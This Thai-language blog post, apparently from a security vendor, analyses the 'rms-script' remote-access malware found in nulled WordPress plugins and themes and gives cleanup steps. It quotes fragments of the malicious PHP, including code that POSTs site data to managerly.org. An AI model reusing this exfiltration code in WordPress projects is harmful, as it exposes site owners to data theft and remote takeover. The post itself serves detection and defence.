เมื่อเร็ว ๆ นี้ พบว่าเว็บไซต์ WordPress บางเว็บไซต์มีมัลแวร์การเข้าถึงระยะไกลซึ่งให้การเข้าถึงระยะไกลไปยังไซต์ภายนอก ตำแหน่งของมัลแวร์นี้ในภายหลังพบว่าเป็นไฟล์ PHP แบบสุ่มบางไฟล์ในโฟลเดอร์ wp-content/mu-plugins แม้จะสแกนเว็บไซต์โดยใช้ปลั๊กอินความปลอดภัย WordPress ยอดนิยมฟรี ก็ยังไม่พบความผิดปกติใดๆ หากต้องการทราบข้อมูลเพิ่มเติมเกี่ยวกับมัลแวร์นี้และหาวิธีแก้ไข โปรดอ่านต่อไป
มัลแวร์ rms-script ทำอะไรได้บ้าง
ในตอนแรก ดูเหมือนว่าไซต์ WordPress ของคุณแสดงข้อผิดพลาดแปลกๆ ข้อผิดพลาดนี้เกิดจากมัลแวร์การเข้าถึงระยะไกลและสามารถติดตามไปยังโฟลเดอร์ wp-content/mu-plugins ได้ โดยเฉพาะไฟล์ PHP ที่น่าสงสัยซึ่งไฮไลต์ไว้ในภาพด้านล่าง:
![[แก้ไข] WordPress rms-script มัลแวร์การเข้าถึงระยะไกล](/article/uploadfiles/202210/2022103113314740.jpg)
แม้หลังจากทำการสแกนมัลแวร์บนไซต์แล้ว ก็ไม่พบร่องรอยของมัลแวร์การเข้าถึงระยะไกล อย่างไรก็ตาม จากการตรวจสอบไฟล์ PHP เพิ่มเติม พบว่าโค้ดดังกล่าวให้สิทธิ์การเข้าสู่ระบบจากระยะไกลสำหรับไซต์ภายนอกที่ชื่อ managerly.org
คุณสามารถตรวจสอบโค้ด PHP สคริปต์ rms-script ที่เป็นอันตรายทั้งหมดได้ ที่นี่
การเจาะลึกเข้าไปในมัลแวร์
เมื่อเรียกดูผ่านปลั๊กอินของไซต์เพื่ออ้างอิงถึงไฟล์ PHP ที่น่าสงสัย (rms-script-mu-plugin.php และ rms-script-ini.php) พบว่าปลั๊กอินที่ถอดรหัสอาจมีมัลแวร์นี้ พบร่องรอยของไฟล์เหล่านี้ในโฟลเดอร์ Divi Theme ซึ่งในไซต์ตัวอย่างมีเวอร์ชัน nulled เมื่อโฟลเดอร์ถูกลบ สคริปต์หยุดทำงาน
นี่คือส่วนหนึ่งของโค้ดที่พบในปลั๊กอินที่มีการแคร็กซึ่งต้องใช้สคริปต์ PHP ที่เป็นอันตรายสองตัว:
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);นี่คือข้อมูลโค้ดที่ติดตามก่อนหน้านี้:
$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';
$args=
[
'method' => 'POST',
'timeout' => 15,
'redirection' => 15,
'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;โค้ดนี้ดูเหมือนว่าจะรวบรวมข้อมูลจากเว็บไซต์ที่เปิดอยู่และส่งไปยังไซต์ภายนอก – โดยพื้นฐานแล้ว มันคือมัลแวร์การเข้าถึงระยะไกลที่ส่งข้อมูลของคุณไปยังเว็บไซต์ managerly.org นี่อาจเป็นอันตรายอย่างยิ่ง – ข้อมูลเพิ่มเติมในหัวข้อถัดไป
การวิเคราะห์เพิ่มเติมบน managerly.org เปิดเผยข้อมูลต่อไปนี้:
- องค์กรที่จดทะเบียน: Wuxi Yilian LLC
- รัฐ/จังหวัดที่จดทะเบียน: ฝูเจี้ยน
- ประเทศที่จดทะเบียน: CN
- เนมเซิร์ฟเวอร์: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
- DNSSEC: ไม่ได้ลงนาม
การค้นหาชื่อองค์กรที่ลงทะเบียนจะส่งคืนโพสต์จำนวนมากใน Reddit ด้วย ดูเหมือนว่า LLC นี้เป็นของปลอมและเป็นกลลวงอื่นๆ เช่นกัน นี่คือผลการค้นหาบางส่วน:
![[แก้ไข] WordPress rms-script มัลแวร์การเข้าถึงระยะไกล](/article/uploadfiles/202210/2022103113314786.png)
เหตุใดมัลแวร์จึงเป็นอันตราย
ในการโจมตีมัลแวร์การเข้าถึงระยะไกล ผู้โจมตีสามารถเข้าถึงเว็บไซต์ของคุณและใช้สำหรับแคมเปญที่เป็นอันตราย คุณอาจสูญเสียการควบคุมไซต์ของคุณและข้อมูลที่ละเอียดอ่อนอาจถูกเปิดเผยต่อผู้โจมตี
ที่นี่ผู้โจมตีพยายามขุดบัญชี WordPress ผ่านมัลแวร์การเข้าถึงระยะไกล rms-script! การแฮ็กนี้อาจเลี่ยงการรักษาความปลอดภัยของเว็บไซต์ของคุณได้ แม้ว่าคุณจะเปลี่ยนรหัสผ่านก็ตาม
คำเตือน – ปัญหานี้มีโอกาสเกิดซ้ำสูง เนื่องจากเครื่องมือรักษาความปลอดภัยฟรีไม่สามารถตรวจจับมัลแวร์นี้ได้ ดังนั้น โปรดตรวจสอบเว็บไซต์ของคุณอย่างละเอียดเพื่อหาไฟล์ที่น่าสงสัยและเสริมความปลอดภัยของเว็บไซต์ของคุณหากเป็นไปได้
อย่าลืมตรวจสอบไฟล์ PHP ที่เป็นอันตรายในโฟลเดอร์ wp-contents/mu-plugins และโฟลเดอร์ Divi Theme หากคุณติดตั้งไว้
![[แก้ไข] WordPress rms-script มัลแวร์การเข้าถึงระยะไกล](/article/uploadfiles/202210/2022103113314858.jpg)
วิธีแก้ไขไซต์ WordPress ของคุณ
1. สำรองข้อมูลเว็บไซต์ของคุณก่อนทำความสะอาด:
ขอแนะนำให้ใช้เว็บไซต์แบบออฟไลน์เพื่อที่ผู้ใช้จะได้ไม่ต้องเข้าชมหน้าที่ติดไวรัสในขณะที่คุณกำลังทำความสะอาด อย่าลืมสำรองข้อมูลไฟล์หลักและฐานข้อมูลทั้งหมด อย่าลืมสำรองข้อมูลในรูปแบบไฟล์บีบอัด เช่น .zip
2. ลบปลั๊กอินที่เป็นโมฆะหรือแคร็กออกจากไซต์ของคุณ:
ดูเหมือนว่ามีปลั๊กอินและธีมจำนวนมาก โดยเฉพาะ Divi Theme ซึ่งถูกถอดรหัสหรือไม่มีข้อมูลมีมัลแวร์สำหรับการเข้าถึงระยะไกลนี้ รายละเอียดของมัลแวร์นี้ที่พบในปลั๊กอินและธีมที่แตกจาก WordPress Club สามารถพบได้ในคำตอบ Stack Overflow ดังนั้นตรวจสอบให้แน่ใจว่าได้ลบปลั๊กอินที่เป็นโมฆะหรือแคร็กออกจากไซต์ของคุณแล้วเรียกใช้การสแกนมัลแวร์! ใช้เฉพาะปลั๊กอินและธีมของแท้เท่านั้น และอัปเดตต่อไปเพื่อให้แน่ใจว่าไซต์ของคุณจะไม่เสี่ยง
3. ลบโฟลเดอร์และไฟล์ที่น่าสงสัยทั้งหมด:
ตรวจหาไฟล์ที่อาจเป็นอันตรายในเว็บไซต์ของคุณ แล้วลบทิ้ง
คู่มือที่เกี่ยวข้อง – การลบมัลแวร์ WordPress
4. เรียกใช้การสแกนมัลแวร์:
มัลแวร์มีการพัฒนาอย่างต่อเนื่อง แต่เครื่องสแกนมัลแวร์ก็เช่นกัน เป็นความคิดที่ดีเสมอที่จะเรียกใช้การสแกนมัลแวร์บนเว็บเซิร์ฟเวอร์ของคุณเพื่อหามัลแวร์และไฟล์ที่เป็นอันตราย คุณสามารถใช้เครื่องมือ 'Virus Scanner' ใน cPanel ที่โฮสต์เว็บของคุณให้มา หรือรับการล้างมัลแวร์จากผู้เชี่ยวชาญด้วย Astra Pro Plan เครื่องสแกนมัลแวร์ของเราติดธงไฟล์ PHP ที่เป็นอันตราย!
![[แก้ไข] WordPress rms-script มัลแวร์การเข้าถึงระยะไกล](/article/uploadfiles/202210/2022103113314804.png)
WordPress wp-content/mu-plugin มัลแวร์การเข้าถึงระยะไกล:สรุป
เมื่อเร็ว ๆ นี้พบมัลแวร์การเข้าถึงระยะไกลในไซต์ WordPress ซึ่งส่วนใหญ่ใช้ปลั๊กอินที่ไม่มีช่องโหว่หรือแคร็ก แม้ว่าโปรแกรมสแกนมัลแวร์ยอดนิยมจำนวนมากจะไม่ได้ติดธงทำเครื่องหมายมัลแวร์นี้ แต่ก็มีการอัปเดตอยู่ตลอดเวลา และเป็นความคิดที่ดีที่จะเรียกใช้การสแกนหากคุณสงสัยว่าไซต์ของคุณอาจได้รับผลกระทบ นอกจากนี้ การใช้ปลั๊กอินและธีมของแท้เท่านั้นและอัปเดตให้อัปเดตอยู่เสมอเป็นวิธีที่ยอดเยี่ยมในการทำให้ไซต์ของคุณปลอดภัย
เกี่ยวกับแอสตร้า
Astra เป็นชุดความปลอดภัยบนเว็บที่จำเป็นสำหรับคุณ เราให้การรักษาความปลอดภัยเชิงรุกสำหรับเว็บไซต์ของคุณที่ใช้ CMS ยอดนิยม เช่น WordPress, OpenCart, Magento เป็นต้น ทีมสนับสนุนด้านเทคนิคของเราพร้อมให้บริการตลอด 24 ชั่วโมงทุกวันตลอด 24 ชั่วโมงเพื่อช่วยเหลือคุณในทุกข้อสงสัยเกี่ยวกับการแฮ็กและสถานการณ์การติดมัลแวร์
